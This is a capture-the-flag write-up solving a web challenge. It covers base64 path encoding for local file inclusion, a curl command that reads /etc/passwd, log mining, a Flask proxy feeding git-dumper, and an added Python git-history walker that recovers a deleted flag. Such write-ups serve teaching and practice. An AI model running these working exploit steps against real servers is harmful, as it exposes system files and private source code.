Shrek Fans Only [Web]

Shrek Fans Only

Shrek seems to be pretty angry about something, so he deleted some important information off his site. He murmured something about Donkey being too committed to infiltrate his swamp. Can you check out the site and see what the status is?

Recon

Website shows an image:

<img src="getimg.php?img=aW1nMS5qcGc%3D">

The img parameter is just a base64-encoded filename (aW1nMS5qcGc= decodes to img1.jpg), so encoding an arbitrary path gives us LFI:

curl -s "http://3.91.17.218/getimg.php?img=`echo -n '/etc/passwd' | base64 -w0`"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
[...]

Bash wrapper for ease of use; hax.sh (the path is base64-encoded and then URL-encoded, since base64 output can contain + and =, which would otherwise be mangled in the query string):

#!/bin/bash
# Usage: ./hax.sh /path/on/server
curl -s -vv -G --data-urlencode "img=$(echo -n "$1" | base64 -w0)" "http://3.91.17.218/getimg.php"

Usage: ./hax.sh "/etc/passwd"

What do

Not sure what to include through the LFI, so we grep the Apache2 error log for inspiration; denied requests are logged there with the full filesystem path, which leaks directory names the server refuses to serve:

./hax.sh "/var/log/apache2/error.log" | grep -i flag | grep -v "not found"

We come across:

client denied by server configuration: /var/www/html/.git/flags
client denied by server configuration: /var/www/html/.git/flag

And indeed, fetching HEAD works:

./hax.sh "/var/www/html/.git/HEAD"

But only through our LFI, since the web server itself refuses to serve .git directly:

$ curl -vv "3.91.17.218/.git"

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>

Solution

We can write a proxy for that...

import requests
from flask import Flask
from base64 import b64encode

app = Flask(__name__)

TARGET = "http://3.91.17.218/getimg.php"
GIT_DIR = "/var/www/html/.git/"


# Only /.git/<something> is proxied; a request for /.git/ itself or for
# /.gitignore falls through to Flask's own 404, which git-dumper tolerates.
@app.route("/.git/<path:path>")
def gitproxy(path):
    # Same trick as hax.sh: base64-encode the absolute path on the server.
    payload = b64encode((GIT_DIR + path).encode()).decode()

    # Pass the value via params so that + and = in the base64 get URL-encoded
    # instead of being decoded to a space by PHP.
    resp = requests.get(TARGET, params={"img": payload})
    content = resp.content
    # A missing file produces a PHP include warning rendered by Xdebug
    # instead of file content; translate that into a 404 for git-dumper.
    if b"xdebug-error xe-warning" in content:
        return "Not found", 404
    return content


if __name__ == "__main__":
    app.run("127.0.0.1", port=1337, debug=True)

... so that we can lazily use git-dumper:

$ python git-dumper.py http://127.0.0.1:1337/.git/ /path/to/output
[-] Testing http://127.0.0.1:1337/.git/HEAD [200]
[-] Testing http://127.0.0.1:1337/.git/ [404]
[-] Fetching common files
[-] Fetching http://127.0.0.1:1337/.gitignore [404]
[-] Fetching http://127.0.0.1:1337/.git/COMMIT_EDITMSG [200]
[-] Fetching http://127.0.0.1:1337/.git/description [200]
[...]
[-] Finding packs
[-] Finding objects
[-] Fetching objects
[-] Fetching http://127.0.0.1:1337/.git/objects/5a/b449745b9c25fb0b56c5fbab8d0c986541233e [200]
[-] Fetching http://127.0.0.1:1337/.git/objects/00/00000000000000000000000000000000000000 [404]
[-] Fetching http://127.0.0.1:1337/.git/objects/c9/566ff84d2e1ae3339bc1e6303d6d3340b5789f [200]
[-] Fetching http://127.0.0.1:1337/.git/objects/75/9be945739b04b63a09e7c02d51567501ead033 [200]
[...]
[-] Running git checkout .
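What git-dumper is doing through that proxy, as an added example that is not part of the original writeup: resolve HEAD, fetch the loose objects one at a time, inflate and verify each one, then walk commit to tree to blob, following parent commits as well, which is where a deleted file still lives. The fetch callback takes a path relative to .git; lfi_fetcher builds the same base64 URL as hax.sh against the page's target (the /var/www/html/.git/ path comes from the error log above), while the demo run uses a constructed in-memory repository so it works offline. The sha1 check on every object is the practical caveat: a PHP warning glued onto the response corrupts the object, and failing loudly beats dumping garbage.

```python
import base64
import hashlib
import urllib.parse
import urllib.request
import zlib


def git_object(kind, body):
    """Loose object as git stores it: sha1 over 'kind size\\0body', then zlib."""
    raw = kind.encode() + b" " + str(len(body)).encode() + b"\0" + body
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)


def git_tree(entries):
    """Tree body is 'mode name\\0' plus 20 raw sha bytes per entry, sorted by name."""
    body = b"".join(mode.encode() + b" " + name.encode() + b"\0" + bytes.fromhex(sha)
                    for mode, name, sha in sorted(entries, key=lambda e: e[1]))
    return git_object("tree", body)


def git_commit(tree_sha, parent_sha, message):
    lines = [b"tree " + tree_sha.encode()]
    if parent_sha:
        lines.append(b"parent " + parent_sha.encode())
    lines += [b"author Shrek <shrek@swamp> 0 +0000",
              b"committer Shrek <shrek@swamp> 0 +0000", b"", message.encode()]
    return git_object("commit", b"\n".join(lines) + b"\n")


def build_fake_git():
    """Constructed sample .git as {relative path: bytes}, standing in for the remote dir.
    Commit 1 adds flag.txt, commit 2 deletes it, so the flag survives only in history."""
    idx = git_object("blob", b"<?php /* index.php placeholder */ ?>\n")
    flag = git_object("blob", b"utflag{constructed_example_flag}\n")
    t1 = git_tree([("100644", "index.php", idx[0]), ("100644", "flag.txt", flag[0])])
    t2 = git_tree([("100644", "index.php", idx[0])])
    c1 = git_commit(t1[0], None, "initial site")
    c2 = git_commit(t2[0], c1[0], "remove sensitive info")
    files = {f"objects/{sha[:2]}/{sha[2:]}": z for sha, z in (idx, flag, t1, t2, c1, c2)}
    files["HEAD"] = b"ref: refs/heads/master\n"
    files["refs/heads/master"] = c2[0].encode() + b"\n"
    return files


def lfi_fetcher(base="http://3.91.17.218/getimg.php"):
    """Reads .git/<path> through the page's base64 LFI (network; the demo uses the fake)."""
    def fetch(path):
        img = base64.b64encode(("/var/www/html/.git/" + path).encode()).decode()
        with urllib.request.urlopen(base + "?img=" + urllib.parse.quote(img, safe="")) as r:
            return r.read()
    return fetch


def read_object(fetch, sha):
    """Fetch, inflate and verify one loose object; returns (kind, body)."""
    raw = zlib.decompress(fetch(f"objects/{sha[:2]}/{sha[2:]}"))
    if hashlib.sha1(raw).hexdigest() != sha:  # truncated or wrapped in server output
        raise ValueError(f"object {sha} failed its sha1 check")
    header, body = raw.split(b"\0", 1)
    kind, size = header.decode().split(" ")
    if int(size) != len(body):
        raise ValueError(f"object {sha}: header says {size} bytes, got {len(body)}")
    return kind, body


def parse_tree(body):
    entries, i = [], 0
    while i < len(body):
        sp = body.index(b" ", i)
        nul = body.index(b"\0", sp)
        entries.append((body[i:sp].decode(), body[sp + 1:nul].decode(),
                        body[nul + 1:nul + 21].hex()))
        i = nul + 21
    return entries


def parse_commit(body):
    """Returns (tree sha, parent shas, message) from a commit body."""
    headers, message = body.split(b"\n\n", 1)
    tree, parents = None, []
    for line in headers.split(b"\n"):
        key, _, val = line.partition(b" ")
        if key == b"tree":
            tree = val.decode()
        elif key == b"parent":
            parents.append(val.decode())
    return tree, parents, message.decode().strip()


def checkout_tree(fetch, tree_sha, prefix=""):
    """Recursively materialise a tree as {path: blob bytes}."""
    files = {}
    for mode, name, sha in parse_tree(read_object(fetch, tree_sha)[1]):
        if mode == "40000":  # subdirectory
            files.update(checkout_tree(fetch, sha, prefix + name + "/"))
        else:
            files[prefix + name] = read_object(fetch, sha)[1]
    return files


def dump_history(fetch):
    """Walk every commit reachable from HEAD; returns [(sha, message, files)], newest first."""
    head = fetch("HEAD").decode().strip()
    todo = [fetch(head[5:]).decode().strip() if head.startswith("ref: ") else head]
    seen, out = set(), []
    while todo:
        sha = todo.pop(0)
        if sha in seen:
            continue
        seen.add(sha)
        tree, parents, message = parse_commit(read_object(fetch, sha)[1])
        out.append((sha, message, checkout_tree(fetch, tree)))
        todo.extend(parents)
    return out


if __name__ == "__main__":
    fake = build_fake_git()  # swap in lfi_fetcher() to run against the real target
    for sha, message, files in dump_history(fake.__getitem__):
        print(sha[:7], message, sorted(files))
```

Only loose objects are handled here; git-dumper also pulls packfiles, which this challenge did not need. Real repositories store directory entries with mode 40000 in trees, which is why the walker recurses on that mode.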

Running tig on the dumped repository we can see the flag:

https://i.imgur.com/uzitos9.png

Flag

utflag{honey_i_shrunk_the_kids_HxSvO3jgkj}